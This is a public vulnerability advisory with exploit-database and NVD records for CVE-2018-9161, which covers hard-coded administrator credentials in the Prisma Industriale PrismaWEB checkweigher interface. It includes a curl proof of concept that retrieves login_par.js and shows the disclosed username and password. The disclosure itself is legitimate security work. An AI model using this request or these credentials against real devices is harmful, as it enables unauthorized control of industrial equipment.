Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass
Vendor: Prisma Industriale S.r.l.
Product web page: https://www.prismaindustriale.com
Affected version: 1.0 (Rev 21, EPROM 202FWSAM ??)
Summary: Web Administration of Machine.
Desc: The vulnerability exists due to the disclosure of hard-coded credentials allowing
an attacker to effectively bypass authentication of PrismaWEB with administrator
privileges. The credentials can be disclosed by simply navigating to the login_par.js
JavaScript page that holds the username and password for the management interface that
are being used via the Login() function in /scripts/functions_cookie.js script.
Tested on: HMS AnyBus-S WebServer
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5453
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php
06.02.2018
---
$ curl http://10.10.10.70/user/scripts/login_par.js
// JavaScript Document
// 11 Dicembre 2009 Release 1.0 Rev.10
var txtChkUser = "prismaweb"; // Nome utente Login
var txtChkPassword = "prisma"; // Password Login
{"id": "EDB-ID:44276", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials", "description": "Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials. Webapps exploit for Multiple platform", "published": "2018-03-12T00:00:00", "modified": "2018-03-12T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/44276/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2018-9161"], "lastseen": "2018-05-24T14:07:20", "viewCount": 5, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2018-05-24T14:07:20", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-9161"]}, {"type": "zeroscience", "idList": ["ZSL-2018-5453"]}], "modified": "2018-05-24T14:07:20", "rev": 2}, "vulnersScore": 5.4}, "sourceHref": "https://www.exploit-db.com/download/44276/", "sourceData": "Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass\r\n\r\n\r\nVendor: Prisma Industriale S.r.l.\r\nProduct web page: https://www.prismaindustriale.com\r\nAffected version: 1.0 (Rev 21, EPROM 202FWSAM ??)\r\n\r\nSummary: Web Administration of Machine.\r\n\r\nDesc: The vulnerability exists due to the disclosure of hard-coded credentials allowing\r\nan attacker to effectively bypass authentication of PrismaWEB with administrator\r\nprivileges. The credentials can be disclosed by simply navigating to the login_par.js\r\nJavaScript page that holds the username and password for the management interface that\r\nare being used via the Login() function in /scripts/functions_cookie.js script.\r\n\r\nTested on: HMS AnyBus-S WebServer\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2018-5453\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php\r\n\r\n06.02.2018\r\n\r\n---\r\n\r\n\r\n$ curl http://10.10.10.70/user/scripts/login_par.js\r\n// JavaScript Document\r\n// 11 Dicembre 2009 Release 1.0 Rev.10\r\n\r\nvar txtChkUser\t\t\t\t= \"prismaweb\";\t// Nome utente Login\r\nvar txtChkPassword \t\t\t= \"prisma\";\t\t// Password Login", "osvdbidlist": []}
{"cve": [{"lastseen": "2021-02-02T06:52:43", "description": "Prisma Industriale Checkweigher PrismaWEB 1.21 allows remote attackers to discover the hardcoded prisma password for the prismaweb account by reading user/scripts/login_par.js.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-31T22:29:00", "title": "CVE-2018-9161", "type": "cve", "cwe": ["CWE-798"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-9161"], "modified": "2018-05-11T17:04:00", "cpe": ["cpe:/a:prismaindustriale:checkweigher_prismaweb:1.21"], "id": "CVE-2018-9161", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9161", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:prismaindustriale:checkweigher_prismaweb:1.21:*:*:*:*:*:*:*"]}], "zeroscience": [{"lastseen": "2020-11-06T21:17:36", "description": "Title: Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass \nAdvisory ID: [ZSL-2018-5453](<ZSL-2018-5453.php>) \nType: Local/Remote \nImpact: DoS, Security Bypass, System Access \nRisk: (5/5) \nRelease Date: 10.03.2018 \n\n\n##### Summary\n\nWeb Administration of Machine. \n\n##### Description\n\nThe vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. \n\n##### Vendor\n\nPrisma Industriale S.r.l. - <https://www.prismaindustriale.com>\n\n##### Affected Version\n\n1.0 (Rev 21, EPROM 202FWSAM ??) \n\n##### Tested On\n\nHMS AnyBus-S WebServer \n\n##### Vendor Status\n\n[06.02.2018] Vulnerability discovered. \n[19.02.2018] Vendor contacted. \n[09.03.2018] No response from the vendor. \n[10.03.2018] Public security advisory released. \n\n##### PoC\n\n[prismaweb_auth.txt](<../../codes/prismaweb_auth.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://exchange.xforce.ibmcloud.com/vulnerabilities/140264> \n[2] <https://packetstormsecurity.com/files/146726> \n[3] <https://cxsecurity.com/issue/WLB-2018030101> \n[4] <https://www.exploit-db.com/exploits/44276/> \n[5] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9161> \n[6] <https://nvd.nist.gov/vuln/detail/CVE-2018-9161>\n\n##### Changelog\n\n[10.03.2018] - Initial release \n[16.03.2018] - Added reference [1], [2], [3] and [4] \n[19.04.2018] - Added reference [5] and [6] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "edition": 17, "published": "2018-03-10T00:00:00", "title": "Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass", "type": "zeroscience", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-9161"], "modified": "2018-03-10T00:00:00", "id": "ZSL-2018-5453", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php", "sourceData": "\r\nPrisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass\r\n\r\n\r\nVendor: Prisma Industriale S.r.l.\r\nProduct web page: https://www.prismaindustriale.com\r\nAffected version: 1.0 (Rev 21, EPROM 202FWSAM ??)\r\n\r\nSummary: Web Administration of Machine.\r\n\r\nDesc: The vulnerability exists due to the disclosure of hard-coded credentials allowing\r\nan attacker to effectively bypass authentication of PrismaWEB with administrator\r\nprivileges. The credentials can be disclosed by simply navigating to the login_par.js\r\nJavaScript page that holds the username and password for the management interface that\r\nare being used via the Login() function in /scripts/functions_cookie.js script.\r\n\r\nTested on: HMS AnyBus-S WebServer\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2018-5453\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php\r\n\r\n06.02.2018\r\n\r\n---\r\n\r\n\r\n$ curl http://10.10.10.70/user/scripts/login_par.js\r\n// JavaScript Document\r\n// 11 Dicembre 2009 Release 1.0 Rev.10\r\n\r\nvar txtChkUser\t\t\t\t= \"prismaweb\";\t// Nome utente Login\r\nvar txtChkPassword \t\t\t= \"prisma\";\t\t// Password Login\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/prismaweb_auth.txt"}]}